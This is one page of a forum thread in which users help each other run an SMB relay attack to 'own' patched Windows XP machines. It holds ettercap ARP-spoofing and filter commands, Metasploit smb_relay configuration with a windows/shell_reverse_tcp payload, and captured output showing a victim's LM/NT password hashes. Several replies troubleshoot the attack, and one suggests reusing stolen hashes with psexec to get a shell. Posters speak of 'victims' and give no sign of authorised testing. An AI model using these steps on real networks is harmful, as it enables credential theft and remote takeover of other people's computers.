Page 4 of 13 FirstFirst ... 23456 ... LastLast

Thread: Own Full patched XP box via HTTP

Good friend of the forums

Quote Originally Posted by dirtydave75 View Post
    I am having problems creating and loading the filters.
    Start over from the beginning of this post if you still don't get it goto http://www.irongeek.com/i.php?page=s...ettercapfilter and do that one first

Just burned his ISO dirtydave75's Avatar

Thanks, will check it out.

Just burned his ISO

what happens if the host has an empty password

Quote Originally Posted by flufsor View Post
    what happens if the host has an empty password
    Try it & find out

# etterfilter makes the smb.ef to use with ettercap

etterfilter smb.filter -o smb.ef
    # run ettercap on target
    ettercap -T -q -F smb.ef -M ARP // // -P autoadd

# start up msfconsole with the RC script
    /pentest/exploits/framework3/msfconsole -r smb.rc

what happends ??

ettercap replaces IMG with \\yourip so then the victim trys to access your SMB_RELAY server for the IMG
    then attacker say NO accsess denied ! victim says OK let me try my login by default
    I am really not getting why am i getting the error INPUT FILE NOT FOUND.Where i should use the commands
    Code:
    .It simply says cannot load filter file.Help samsung.

Quote Originally Posted by ibrahim52 View Post
    I am really not getting why am i getting the error INPUT FILE NOT FOUND.Where i should use the commands
    Code:
    .It simply says cannot load filter file.Help samsung.
    copy & paste YOUR FILTER FILE into your /pentest/exploits/framework3 directory

i guess i am the only fool on this forum,for whom its just NOTHING WORKS.I do SUX.Well,tried pawning from three different ways as per this topic and one more
    Code:
    http://forum.remote-exploit.org/showthread.php?t=9121&page=2
    when i am trying
    Code:
    sessions -l
    its just says NO ACTIVE SESSIONS even from the web interface of metasploit.Now i am having two doubt.Its just work on LAN ? Bcs i am having two computers on LAN and my laptop which is wireless and bt3 installed.Should i post my output results here and one more thing.Is it because of my intel pro 2200 BG card ?.I know i really sux.First it was SEND L3 ERROR and now this.When i am gonna reply here that this thing really worked for me .Pleas help

Quote Originally Posted by drwalter View Post
    Can somebody give me a hand with this:

msfconsole error: (edited specs)[*] Sending Access Denied to 192.168.1.45:1613 CREAMYPOOF\Owner[*] Received 192.168.1.45:1616 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Sending Access Denied to 192.168.1.45:1616 \[*] Received 192.168.1.45:1616 CREAMYPOOF\Owner LMHASH:89b2130fb1f3ca3b034ac299c5c393e8578ecde5ac3 1cce7 NTHASH:301f879f15b7ce8216bd2425a1532efbdcb5208feab 1a88b OS:Windows 2002 Service Pack 2 2600 LM:Windows 2002 5.1[*] Authenticating to 192.168.1.45 as CREAMYPOOF\Owner...[*] AUTHENTICATED as CREAMYPOOF\Owner...

[-] FAILED! The remote host has only provided us with Guest privileges. Please make sure that the correct username and password have been provided. Windows XP systems that are not part of a domain will only provide Guest privileges to network logins by default.

What's the latter part about not being part of a domain? I'm just trying to isolate the problem.
    i am having the same problem.Two doubts samsung.Just want to confirm, am i going correct or not.

Here ,should i use the gateway or the Victims ip bcs i tried both.
    Code:
    use exploit/windows/smb/smb_relay
    set PAYLOAD windows/shell_reverse_tcp
    set LHOST ( Victims IP)
    set LPORT 21
    exploit
    and in the script too.So am i going right.Sorry u must have never faced silly questions like i am asking on this forum of proz.

Quote Originally Posted by ibrahim52 View Post
    i am having the same problem.Two doubts samsung.Just want to confirm, am i going correct or not.

Here ,should i use the gateway or the Victims ip bcs i tried both.
    Code:
    use exploit/windows/smb/smb_relay
    set PAYLOAD windows/shell_reverse_tcp
    set LHOST ( Victims IP)
    set LPORT 21
    exploit
    and in the script too.So am i going right.Sorry u must have never faced silly questions like i am asking on this forum of proz.
    You have doubts??

I can't see where your going wrong, did you watch my video & follow it? I tried to make it as clear as I could

When you have launched msfconsole, have you tried to open various different pages on your victim machine, just to see will it exploit?

that ettercap script is performing a MITM attack to get the users to connect to your server for any images that are served up.

that is one method. another method would be to just get a victim to click a link or go to a webpage that has an embedded link to your fake SMB share.

a video is available on learnsecurityonline that shows that, its in the hack videos section --> Chicagocon MSF Demo: MSF SMB Relay with Reverse Shell

to answer some of the other questions, its pretty much a LAN only (well within the domain would be more right) attack and the victim needs to be joined to a domain, just like someone mentioned.

what might be more fun for you that arent joined to a domain but are running as admin would be to take that hash you see thats failing and throw that into the psexec module of metasploit and getting a shell that way (sorry no video).

Page 4 of 13 FirstFirst ... 23456 ... LastLast